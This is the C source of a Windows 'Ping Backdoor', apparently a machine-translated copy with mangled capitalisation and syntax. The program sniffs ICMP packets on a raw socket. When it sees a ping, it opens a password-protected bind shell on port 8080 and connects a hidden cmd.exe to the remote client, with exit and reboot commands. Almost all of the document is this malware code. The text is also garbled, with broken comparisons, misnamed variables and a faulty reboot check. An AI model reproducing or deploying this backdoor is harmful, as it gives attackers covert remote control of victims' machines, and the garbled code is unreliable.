Extremely concealed Ping BackdoorSource code
# Include <stdio. h>
# Include <stdlib. h>
# Include <winsock2.h>
# Include <ws2tcpip. h>
# Include <mstcpip. h>
# Define ICMP_Echo 8 // The type of ICMP echo request message is 8
# Define ICMP_ECHOREPLY 0 // The type value of the ICMP echo response packet is 0
# Define sniffer_icmp_size 101 // large for listening to ICMP packets?
# Define bind_port 8080 // default bind shell Port
# Define max_packet 10000 // What is the maximum ICMP packet size?
# Define def_password "givemeshell! "// Default password
# Define xmalloc (s) heapalloc (getprocessheap (), heap_zero_memory, (s ))
// Define the IP Header
Typedef struct iphdr
{
Unsigned char h_verlen; // 4-bit header length, 4-bit IP address version 1
Unsigned char TOS; // 8-bit service type TOS 1
Unsigned short total_len; // The total length of 16 bits (in bytes) 2
Unsigned short ident; // 16-bit ID 2
Unsigned short frag_and_flags; // 3-digit flag 2
Unsigned char TTL; // 8-bit TTL 1
Unsigned char proto; // 8-bit protocol (TCP, UDP, or other) 1
Unsigned short checksum; // 16-bit IP header checksum 2
Unsigned int sourceip; // 32-bit source IP address 4
Unsigned int destip; // 32-bit destination IP address 4
} Ipheader; // IP header length: 20
// Define the ICMP Header
Typedef struct _ ihdr
{
Unsigned char I _type; // 8-bit type 1
Unsigned char I _code; // 8-bitCode1
Unsigned short I _cksum; // 16-bit checksum and 2
Unsigned short I _id; // identification number (identified by process number) 2
Unsigned short I _seq; // message serial number 2
} Icmpheader; // ICMP Header Length: 8
Int sniffer (); // listen to ICMP?
Void decode_sniffer (char *, Int, struct sockaddr_in *); // simple sniffer unpackProgram
Int bindshell (); // bind Shell
DWORD dwbufferlen [10];
DWORD dwbufferinlen = 1;
DWORD dwbytesreturned = 0;
Handle bindthread;
// Main icmpdoor Function
Int main (INT argc, char ** argv)
{
Wsadata;
Int retval;
// Socket Initialization
If (retval = wsastartup (makeword (2, 2), & wsadata ))! = 0)
{
Printf ("wsastartup failed: % d \ n", retval );
Exit (-1 );
}
// Start sniffer
Sniffer ();
// Socket ends
Wsacleanup ();
Return 0;
}
// Main function of sniffer
Int sniffer ()
{
Int packsize = sniffer_icmp_size;
Socket socksniffer;
Struct sockaddr_in DEST, from;
Struct hostent * HP;
Int sread;
Int fromlen = sizeof (from );
Unsigned char localname [256];
Char * recvbuf;
// Create an original socket to accept all received packets (sniffer)
If (socksniffer = wsasocket (af_inet, sock_raw, ipproto_ip, null, 0, wsa_flag_overlapped) = invalid_socket)
{
Printf ("wsasocket () failed: % d \ n", wsagetlasterror ());
Return-1;
}
// Obtain the local address
Gethostname (char *) localname, sizeof (localname)-1 );
If (HP = gethostbyname (char *) localname) = NULL)
{
Return-1;
}
Memset (& DEST, 0, sizeof (DEST ));
Memcpy (& DeST. sin_addr.s_addr, HP-> h_addr_list [0], HP-> h_length); // TCP sniffing options
DeST. sin_family = af_inet;
DeST. sin_port = htons (8000); // specify any port
// Socket bind
BIND (socksniffer, (psockaddr) & DEST, sizeof (DEST ));
// Set socket to accept all packets
Wsaioctl (socksniffer, sio_rcvall, & dwbufferinlen, sizeof (dwbufferinlen), & dwbufferlen,
Sizeof (dwbufferlen), & dwbytesreturned, null, null );
// Allocate the socket receiving buffer size to max_packet
Recvbuf = (char *) xmalloc (max_packet );
Printf ("sniffer OK! ");
// The size of the loop listener package
While (1)
{
// Read data
Sread = recvfrom (socksniffer, recvbuf, max_packet, 0, (struct sockaddr *) & from, & fromlen );
// If an error occurs while reading data
If (sread = socket_error | sread <0)
{
If (wsagetlasterror () = wsaetimedout)
{
Continue;
}
Printf ("recvfrom failed: % d \ n", wsagetlasterror ());
Return-1;
}
Else
// If (sread> = 28)
// If the size of the read data = the size of the listener package + 28
If (sread = packsize + 28)
{
// Send the received data to the sniffer unpacking program for processing.
Decode_sniffer (recvbuf, sread-28, & from );
}
}
Return 1;
}
// Simple sniffer unpacking program
Void decode_sniffer (char * Buf, int bytes, struct sockaddr_in * From)
{
Icmpheader * icmphdr;
// The ICMP header address equals the length of the BUF + IP header: BUF + 20
Icmphdr = (icmpheader *) (BUF + sizeof (ipheader ));
/*
Printf ("\ r \ n % d bytes from % s,", bytes, inet_ntoa (from-> sin_addr); // retrieve the received data
Printf ("icmp_type: % d", icmphdr-> I _type); // check type
Printf ("icmp_seq: % d \ r \ n", icmphdr-> I _seq); // retrieve the serial number
//? Outbound data segment BUF + 28 + I
For (INT I = 0; I <bytes-1; I ++)
{
Printf ("% C", * (BUF + sizeof (ipheader) + sizeof (icmpheader) + I ));
}
*/
// If (icmphdr-> I _type = ICMP_Echo | icmphdr-> I _type = ICMP_ECHOREPLY)
// Determine if the packet is an ICMP request packet
If (icmphdr-> I _type = ICMP_Echo)
{
// Bind Shell
Bindshell ();
// DWORD bid;
// Bindthread = createthread (null, 0, bindshell, 0, 0, & bid );
}
Else
Printf ("\ r \ n get other packets! ");
Return;
}
// Bind shell function
Int bindshell (){
Int bport = bind_port;
Socket bindserver, getclient;
Struct sockaddr_in addrserver, addrclient;
Char buff [4096];
Char * messages = "\ r \ n ====================== Ping backdoor v0.1 ==== ===============================\ r \ n ========== code by lion.
Welcome to <a href = 'HTTP: // www.cnhonker.net 'target = _ blank> http://www.cnhonker.net </a> ===========\ r \ n ";
Char * getpass = "\ r \ n your password :";
Char * passok = "\ r \ n OK! Please enter :";
Char * nothispass = "\ r \ n sorry, your password not right. \ r \ n ";
Char * exitok = "\ r \ n exit OK! \ R \ n ";
Char * rebootok = "\ r \ n reboot now! \ R \ n ";
// Create a socket
Bindserver = socket (af_inet, sock_stream, ipproto_tcp );
// Specify the server address and port
Addrserver. sin_family = af_inet;
Addrserver. sin_port = htons (bport );
Addrserver. sin_addr.s_addr = addr_any;
// Set timeout
Int timeout = 60000;
Setsockopt (bindserver, sol_socket, so_rcvtimeo, (char *) & timeout, sizeof (timeout ));
// Set the reuse Port
Uint breuser = 1;
Setsockopt (bindserver, sol_socket, so_reuseaddr, (char *) & breuser, sizeof (breuser ));
// Listening port
BIND (bindserver, (struct sockaddr *) & addrserver, sizeof (addrserver ));
Listen (bindserver, 2 );
Printf ("\ r \ n bind port on % d OK.", bport );
// Accept client connection
Int ilen = sizeof (addrclient );
// Receives one connection
Getclient = accept (bindserver, (struct sockaddr *) & addrclient, & ilen );
If (getclient! = Invalid_socket)
{
// If there is a connection, set the delay to 60 s.
Int itimeout = 60000;
Setsockopt (getclient, sol_socket, so_rcvtimeo, (char *) & itimeout, sizeof (itimeout ));
}
Else
Return-1;
// Write welcome information
Send (getclient, messages, strlen (messages), 0 );
// WRITE password verification information
Send (getclient, getpass, strlen (getpass), 0 );
// Receive data
Recv (getclient, buff, 0 );
// Verify the password
If (! (Strstr (buff, def_password )))
{
// If the password is incorrect, write the Password error message
Send (getclient, nothispass, strlen (nothispass), 0 );
Printf ("\ r \ n password not right! ");
Closesocket (getclient );
Closesocket (bindserver );
Return-1;
}
// Write verification information
Send (getclient, passok, strlen (passok), 0 );
// Create two anonymous Pipelines
Handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;
Unsigned long lbytesread;
Security_attributes SA;
SA. nlength = 12;
SA. lpsecuritydescriptor = 0;
SA. binherithandle = true;
Createpipe (& hreadpipe1, & hwritepipe1, & SA, 0 );
Createpipe (& hreadpipe2, & hwritepipe2, & SA, 0 );
Startupinfo siinfo;
Char character line [] = "cmd.exe ";
Process_information processinformation;
Zeromemory (& siinfo, sizeof (siinfo ));
Siinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Siinfo. wshowwindow = sw_hide;
Siinfo. hstdinput = hreadpipe2; // read the data written by the socket to pipe2
Siinfo. hstdoutput = siinfo. hstderror = hwritepipe1; // write data here
Printf ("\ r \ n pipe create OK! ");
// Create a cmd process that reads data from hreadpipe2 and writes data to hwritepipe1
Int bread = CreateProcess (null, cmdline, null, & siinfo, & processinformation );
While (1)
{
// Check whether data is returned in the MPs queue
Int ret = peeknamedpipe (hreadpipe1, buff, 1024, & lbytesread );
If (lbytesread)
{
// Read data from the pipeline hreadpipe1
Ret = readfile (hreadpipe1, buff, lbytesread, & lbytesread, 0 );
If (! RET) break;
// Write the data read from the pipeline hreadpipe1 to the getclient
Ret = Send (getclient, buff, lbytesread, 0 );
If (Ret <= 0) break;
}
Else
{
// If the getclient connection receives data
Lbytesread = Recv (getclient, buff, 1024,0 );
If (lbytesread <= 0) break;
// Write the data read from the getclient connection to hwritepipe2
Ret = writefile (hwritepipe2, buff, lbytesread, & lbytesread, 0 );
If (lbytesread> 4 & buff [0] = 'E' & buff [1] = 'X' & buff [2] = 'I '&& buff [3] = 'T ')
{
// Write and exit Information
Send (getclient, exitok, strlen (exitok), 0 );
Closesocket (getclient );
Closesocket (bindserver );
Return 1;
}
Else if (lbytesread> 6 & buff [0] = 'R' & buff [1] = 'E' & buff [2] = 'B '& & buff [3] = 'O '&&
Buff [1] = 'O' & buff [2] = 'T ')
{
// Write restart
Send (getclient, rebootok, strlen (rebootok), 0 );
Closesocket (getclient );
Closesocket (bindserver );
Exitwindowsex (ewx_reboot, null );
Return 1;
}
If (! RET) break;
}
}
Closesocket (getclient );
Closesocket (bindserver );
Return 1;
}